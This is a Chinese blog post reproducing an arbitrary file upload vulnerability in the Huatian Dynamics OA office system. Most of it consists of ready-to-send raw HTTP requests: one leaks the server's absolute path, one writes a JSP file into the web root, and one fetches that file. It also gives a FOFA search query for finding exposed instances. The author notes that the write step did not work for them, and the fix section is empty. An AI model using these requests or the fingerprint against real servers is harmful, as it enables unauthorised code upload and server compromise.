【漏洞复现】天OA存在任意文件上传漏洞

最新推荐文章于 2024-03-30 23:34:13 发布

丢了少年失了心1

最新推荐文章于 2024-03-30 23:34:13 发布

阅读量776

点赞数 1

分类专栏：网络安全 web安全渗透测试漏洞复现文章标签：开发语言 web安全网络安全文件上传渗透测试漏洞复现

本文链接：https://blog.csdn.net/u010025272/article/details/132757642

版权

网络安全 web安全渗透测试漏洞复现专栏收录该内容

184 篇文章 71 订阅 ¥29.90 ¥99.00

订阅专栏

超级会员免费看

漏洞描述

华天动力协同办公系统将先进的管理思想、管理模式和软件技术、网络技术相结合，为用户提供了低成本、高效能的协同办公和管理平台。睿智的管理者通过使用华天动力协同办公平台，在加强规范工作流程、强化团队执行、推动精细管理、促进营业增长等工作中取得了良好的成效。

该OA系统存在任意文件上传漏洞，攻击者通过漏洞可以获取服务器的敏感信
在这里插入图片描述

免责声明

技术文章仅供参考，任何个人和组织使用网络应当遵守宪法法律，遵守公共秩序，尊重社会公德，不得利用网络从事危害国家安全、荣誉和利益，未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失，均由使用者本人负责。本文所提供的工具仅用于学习，禁止用于其他！！

资产确定

fofa：body="/OAapp/WebObjects/OAapp.woa" || body="/OAapp/htpages/app"

漏洞复现

1.执行如下语句获取绝对路径的敏感信息。


POST /OAapp/jsp/upload.jsp HTTP/1.1
Host:{Hostname}
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary5Ur8laykKAWws2QO
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Length: 293

------WebKitFormBoundary5Ur8laykKAWws2QO
Content-Disposition: form-data; name="file"; filename="xxx.xml"
Content-Type: image/png

real path
------WebKitFormBoundary5Ur8laykKAWws2QO
Content-Disposition: form-data; name="filename"

xxx.png
------WebKitFormBoundary5Ur8laykKAWws2QO--

在这里插入图片描述
2.写入normalLoginPageForOther.jsp文件，内容为输出2023-02-1

POST /OAapp/htpages/app/module/trace/component/fileEdit/ntkoupload.jsp HTTP/1.1
Host: {Hostname}
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryzRSYXfFlXqk6btQm
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Length: 389

------WebKitFormBoundaryzRSYXfFlXqk6btQm
Content-Disposition: form-data; name="EDITFILE"; filename="xxx.txt"
Content-Type: image/png

<%out.print("hello word");%>
------WebKitFormBoundaryzRSYXfFlXqk6btQm
Content-Disposition: form-data; name="newFileName"

D:/htoa/Tomcat/webapps/OAapp/htpages/app/module/login/normalLoginPageForOther.jsp
------WebKitFormBoundaryzRSYXfFlXqk6btQm--

第二步这里，我试了几次没有写成功，可能是post请求body部分哪里没有搞对，有兴趣的可以试一试，成功了告诉我

3.访问normalLoginPageForOther.jsp文件，得到内容“hello word”


GET /OAapp/htpages/app/module/login/normalLoginPageForOther.jsp HTTP/1.1
Host: {hostname}
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1

修复方案

丢了少年失了心1

关注

1
点赞
踩
2

收藏

觉得还不错? 一键收藏
打赏
0
评论
【漏洞复现】天OA存在任意文件上传漏洞

技术文章仅供参考，任何个人和组织使用网络应当遵守宪法法律，遵守公共秩序，尊重社会公德，不得利用网络从事危害国家安全、荣誉和利益，未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失，均由使用者本人负责。华天动力协同办公系统将先进的管理思想、管理模式和软件技术、网络技术相结合，为用户提供了低成本、高效能的协同办公和管理平台。第二步这里，我试了几次没有写成功，可能是post请求body部分哪里没有搞对，有兴趣的可以试一试，成功了告诉我。
复制链接

扫一扫